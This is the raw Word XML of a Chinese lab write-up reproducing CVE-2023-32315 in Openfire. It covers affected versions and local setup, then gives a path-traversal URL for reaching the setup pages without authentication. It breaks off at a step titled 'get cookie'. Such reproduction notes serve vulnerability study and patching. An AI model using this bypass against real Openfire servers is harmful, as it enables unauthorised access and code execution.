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3F487" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4488AD88" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A760B54" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7668AF76" w14:textId="195CDE2B" w:rsidR="00DA5227" w:rsidRDefault="00AC0119">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="00AC0119"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  <w:t>CVE-2023-32315</w:t>
      </w:r>
      <w:r w:rsidR="00DA5227" w:rsidRPr="00DA5227"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CF2D7" w14:textId="325197CB" w:rsidR="00DA5227" w:rsidRDefault="00C14A5F">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="00C14A5F">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Openfire</w:t>
      </w:r>
      <w:r w:rsidR="00DA5227" w:rsidRPr="00DA5227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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815E5BA" w14:textId="53184CCB" w:rsidR="0078712B" w:rsidRDefault="00C14A5F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C14A5F">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>未授权到RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AD61B" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EA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="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:id w:val="147465128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szCs w:val="44"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0F9492DE" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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51D305F2" w14:textId="1E7CA497" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc27475" w:history="1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞描述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_Toc27475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15C6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797F0B4" w14:textId="74967F91" w:rsidR="0078712B" w:rsidRDefault="00785DEB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25949" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>影响版本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_Toc25949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1F15C6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF9F06D" w14:textId="598CBD1E" w:rsidR="0078712B" w:rsidRDefault="00785DEB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5232" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境部署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_Toc5232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1F15C6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31894091" w14:textId="7E7B1AD4" w:rsidR="0078712B" w:rsidRDefault="00785DEB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1219" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc11219 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001F15C6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="797ED2A3" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1163C0DC" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA8553" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B"/>
    <w:p w14:paraId="52098CFB" w14:textId="3F0D8041" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc27475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="730DB4F7" w14:textId="45BEC186" w:rsidR="00C14A5F" w:rsidRPr="004C1793" w:rsidRDefault="00C14A5F" w:rsidP="00A00FDD">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc25949"/>
      <w:r w:rsidRPr="00C14A5F">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Openfire是一个开源的实时协作（RTC）服务器，采用开源Apache许可证。它是一个即时通讯（IM）和群聊服务器，使用Java编写并使用XMPP协议。它非常易于设置和管理，但提供了坚实的安全性和性能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52041AA6" w14:textId="1546D2AE" w:rsidR="0078712B" w:rsidRPr="004C1793" w:rsidRDefault="006C2EAA" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="64B601DC" w14:textId="7A8C8895" w:rsidR="00C14A5F" w:rsidRPr="00C14A5F" w:rsidRDefault="00C14A5F" w:rsidP="00C14A5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C14A5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3.10.0&lt;= Openfire &lt;4.6.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82F7F2" w14:textId="35723CA0" w:rsidR="00C14A5F" w:rsidRPr="004C1793" w:rsidRDefault="00C14A5F" w:rsidP="00C14A5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C14A5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.7.0&lt;=Openfire &lt;4.7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F2E2C" w14:textId="52057EB4" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc5232"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="641AF59F" w14:textId="05235B39" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>靶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机：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7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，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>172.16.7.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DB1F9" w14:textId="613F3E55" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>渗透机：</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>172.16.7.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5E847" w14:textId="7421BBD6" w:rsidR="00705A99" w:rsidRDefault="00705A99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4D2FF3C2" w14:textId="0D7D5459" w:rsidR="0025100D" w:rsidRDefault="0025100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下载含有漏洞的软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B2943" w14:textId="0DA30793" w:rsidR="0025100D" w:rsidRDefault="006E30B6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
      </w:pPr>
      <w:r w:rsidRPr="006E30B6">
        <w:t>https://objects.githubusercontent.com/github-production-release-asset-2e65be/18511687/11d97550-912d-4723-bfef-3752e71f79c0?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Credential=AKIAIWNJYAX4CSVEH53A/20230826/us-east-1/s3/aws4_request&amp;X-Amz-Date=20230826T031725Z&amp;X-Amz-Expires=300&amp;X-Amz-Signature=1105f17f1e76f72a21b5b0ce73ac1d259b7ed607a7dc91c7d74d4222bbe3393d&amp;X-Amz-SignedHeaders=host&amp;actor_id=108575004&amp;key_id=0&amp;repo_id=18511687&amp;response-content-disposition=attachment; filename=openfire_4_7_4_x64.exe&amp;response-content-type=application/octet-stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42664295" w14:textId="77777777" w:rsidR="006E30B6" w:rsidRDefault="006E30B6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7F188068" w14:textId="39FB6B70" w:rsidR="0025100D" w:rsidRDefault="0025100D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</w:p>
    <w:p w14:paraId="7D55821F" w14:textId="1C199813" w:rsidR="0025100D" w:rsidRDefault="006E30B6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625C09" wp14:editId="69425AD2">
            <wp:extent cx="5274310" cy="39782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DE28" w14:textId="4A49BA88" w:rsidR="006E30B6" w:rsidRDefault="006E30B6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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ABCC6A3" wp14:editId="1AA86C26">
            <wp:extent cx="5274310" cy="3342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CD40" w14:textId="33E65405" w:rsidR="006E30B6" w:rsidRDefault="006E30B6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480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配置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Java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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26320289" w14:textId="0B08EE1A" w:rsidR="003F1296" w:rsidRDefault="003F1296" w:rsidP="003F1296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A31822" wp14:editId="3BE1D580">
            <wp:extent cx="4238095" cy="23523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88C9" w14:textId="1BB32E82" w:rsidR="006E30B6" w:rsidRDefault="003F1296" w:rsidP="003F1296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B9E71D1" wp14:editId="08815BC3">
            <wp:extent cx="4457143" cy="3409524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ED97" w14:textId="6EAF53A6" w:rsidR="003F1296" w:rsidRDefault="003F1296" w:rsidP="003F1296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DD09116" wp14:editId="502D2348">
            <wp:extent cx="4244453" cy="2834064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7191" cy="28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06FB" w14:textId="34D8C09E" w:rsidR="003F1296" w:rsidRPr="003F1296" w:rsidRDefault="003F1296" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center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lastRenderedPageBreak/>
        <w:t>运行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Java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命令提示缺少运行库</w:t>
      </w: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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF651F" w14:textId="7A622B10" w:rsidR="003F1296" w:rsidRDefault="003F1296" w:rsidP="003F1296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F23B01F" wp14:editId="1F627DFD">
            <wp:extent cx="5274310" cy="41732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F176" w14:textId="0914BDB7" w:rsidR="003F1296" w:rsidRDefault="003F1296" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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安装必备运行库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBED1A5" w14:textId="6ADA9C54" w:rsidR="003F1296" w:rsidRDefault="000057EA" w:rsidP="003F1296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3C1F252" wp14:editId="03C9AC10">
            <wp:extent cx="5274310" cy="8331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3D65" w14:textId="7C280AF2" w:rsidR="000057EA" w:rsidRDefault="000057EA" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center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成功运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C0472" w14:textId="2D8D61E9" w:rsidR="003F1296" w:rsidRDefault="000057EA" w:rsidP="003F1296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E7BDC5A" wp14:editId="20C15139">
            <wp:extent cx="3142857" cy="14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F426" w14:textId="2A720E7C" w:rsidR="000057EA" w:rsidRDefault="000057EA" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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继续安装软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A2839C" w14:textId="2391F2B5" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296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54AC712" wp14:editId="70C3B1C3">
            <wp:extent cx="3104762" cy="1409524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D8A8" w14:textId="0927495C" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296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B33E89C" wp14:editId="616F5C85">
            <wp:extent cx="4428571" cy="34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0891" w14:textId="33835E17" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296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6623BED0" wp14:editId="045C1DB0">
            <wp:extent cx="4438095" cy="3447619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54D2" w14:textId="30FD3D51" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296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7CEC06" wp14:editId="2B77634B">
            <wp:extent cx="4523809" cy="34952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1939" w14:textId="7670F470" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center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启动并访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>localhost:9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90F203" w14:textId="665E5FA0" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296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8323D1E" wp14:editId="13835915">
            <wp:extent cx="5274310" cy="29819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6F8A" w14:textId="67566BD1" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296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A909DAF" wp14:editId="005566D3">
            <wp:extent cx="5274310" cy="25050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0F7C" w14:textId="142FE41D" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial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1EE99D18" wp14:editId="603F1C50">
            <wp:extent cx="5274310" cy="15144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EBA1" w14:textId="6FBB6860" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
        <w:jc w:val="center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3A022B0" wp14:editId="6A2DAEE1">
            <wp:extent cx="5274310" cy="36144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C942" w14:textId="574BDB7B" w:rsidR="006F0165" w:rsidRDefault="006F0165" w:rsidP="003F1296">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其他选项默认，数据库选择嵌入式数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B18CCD" w14:textId="72D00DF8" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc11219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1A736B51" w14:textId="280D725F" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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【步骤一】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64063AED" w14:textId="373678D9" w:rsidR="005B758B" w:rsidRDefault="00E33399" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>访问一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6DD7F" w14:textId="61AB25F4" w:rsidR="00E33399" w:rsidRDefault="00E33399" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="0043617E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidRPr="0043617E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>localhost</w:t>
        </w:r>
        <w:r w:rsidRPr="0043617E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="573938CA" w14:textId="546FD6E3" w:rsidR="00E33399" w:rsidRPr="00E33399" w:rsidRDefault="00E33399" w:rsidP="00E33399">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="lef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1939ABB" wp14:editId="660EE89E">
            <wp:extent cx="5274310" cy="27940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60D0" w14:textId="1BC7B052" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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【步骤二】</w:t>
      </w:r>
      <w:r w:rsidR="00D727C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00D727C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D727C5">
        <w:rPr>
